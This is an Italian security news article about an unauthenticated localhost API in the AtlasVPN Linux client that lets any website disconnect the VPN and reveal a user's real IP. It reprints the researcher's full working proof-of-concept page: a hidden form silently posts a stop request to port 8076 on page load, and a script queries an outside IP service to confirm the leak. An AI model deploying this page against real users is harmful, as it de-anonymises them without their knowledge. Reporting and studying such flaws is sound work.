Redazione RHC : 4 Settembre 2023 16:46
Pochi giorni fa sul sito Reddit è apparsa la notizia della scoperta di una grave vulnerabilità di sicurezza nel client AtlasVPN per il sistema operativo Linux.
Un ricercatore di sicurezza informatica che ha voluto rimanere anonimo ha pubblicato un exploit PoC funzionante e ha dimostrato al pubblico come gli aggressori possono ottenere l’accesso al vero indirizzo IP di qualsiasi utente della versione Linux del client VPN menzionato sopra.
“AtlasVPN non prende sul serio la sicurezza dei suoi utenti. Le loro soluzioni di sicurezza software fanno così schifo che è difficile credere che si tratti di un bug e non di una backdoor. Nessuno può essere così incompetente”, uno specialista anonimo ha criticato l’approccio dell’azienda.
 Prova la Demo di Business Log! Adaptive SOC italiano Log management non solo per la grande Azienda, ma una suite di Audit file, controllo USB, asset, sicurezza e un Security Operation Center PERSONALE, che ti riporta tutte le operazioni necessarie al tuo PC per tutelare i tuoi dati e informati in caso di problemi nel tuo ambiente privato o di lavoro.
Scarica ora la Demo di Business Log per 30gg
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
<html>
<head>
<title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
</head>
<body>
<pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
You should be running the atlasvpn linux client and be connected to a VPN.
Use <b>atlasvpn connect</b> to connect to a VPN server.
</code></pre>
<iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
<form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
<button type="submit" style="display: none"></button>
</form>
<script>
window._currentIP = false;
// Run main exploit code
window.addEventListener('load', function () {
addIPToLog();
setTimeout(triggerFormSubmission, 1000);
setTimeout(addIPToLog, 3000);
});
// Blind CORS request to atlasvpnd to disconnect the VPN
function triggerFormSubmission() {
var logDiv = document.getElementById('log');
logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";
document.getElementById('stopForm').submit();
}
// Gets IP from ipfy API (this, of course, could be your server)
function addIPToLog() {
var logDiv = document.getElementById('log');
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://api.ipify.org?format=json', true);
xhr.onload = function () {
var ipAddress = window._currentIP;
if (xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
ipAddress = response.ip;
logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";
} else {
logDiv.innerHTML += '[-] Error fetching IP address.\n';
}
// Check if the IP changed. If yes: Success.
if (window._currentIP && window._currentIP != ipAddress) {
logDiv.innerHTML += "[+] Successfully disconnected VPN."
}
if (window._currentIP && window._currentIP == ipAddress) {
logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
}
// Save IP for next iteration.
window._currentIP = ipAddress;
};
xhr.send();
}
</script>
</body>
</html>
Secondo il ricercatore la vulnerabilità è dovuta a una serie di gravi errori nell’architettura dell’applicazione. Nello specifico, il client AtlasVPN apre l’API su localhost sulla porta 8076, che non ha assolutamente alcun tipo di autenticazione.
Sulla base di ciò, qualsiasi programma in esecuzione sul computer, incluso un browser Web, può avere pieno accesso a questa porta. Ciò significa che qualsiasi sito web con il contenuto appropriato può inviare una richiesta su questa porta e disabilitare banalmente la VPN, rivelando quindi il reale indirizzo IP dell’utente .
L’esperto ha provato a contattare il supporto AtlasVPN per segnalare la vulnerabilità, ma non ha ricevuto risposta. A suo avviso, ciò indica un atteggiamento negligente dell’azienda nei confronti della sicurezza dei propri clienti.
Al momento della pubblicazione di questa notizia, i rappresentanti di AtlasVPN non hanno commentato la situazione.
Si consiglia a tutti gli utenti del client sotto Linux di prestare attenzione quando visitano siti non verificati o addirittura di modificare temporaneamente il client VPN finché la vulnerabilità non verrà risolta.
RedazioneCisco ha reso noto recentemente di aver scoperto una nuova tipologia di attacco informatico mirato a compromettere i dispositivi che operano con i software Cisco Secure Firewall Adaptive Security Appl...
Nel mese di Settembre è uscita una nuova vulnerabilità che riguarda Notepad++. La vulnerabilità è stata identificata con la CVE-2025-56383 i dettagli possono essere consultati nel sito del NIST. L...
Gli aggressori stanno utilizzando una tecnica avanzata che implica il caricamento laterale di DLL tramite l’applicazione Microsoft OneDrive. In questo modo riescono ad eseguire codice malevolo senza...
I ladri sono entrati attraverso una finestra del secondo piano del Musée du Louvre, ma il museo aveva avuto anche altri problemi oltre alle finestre non protette, secondo un rapporto di audit sulla s...
Reuters ha riferito che Trump ha detto ai giornalisti durante un’intervista preregistrata nel programma “60 Minutes” della CBS e sull’Air Force One durante il viaggio di ritorno: “I chip pi�...
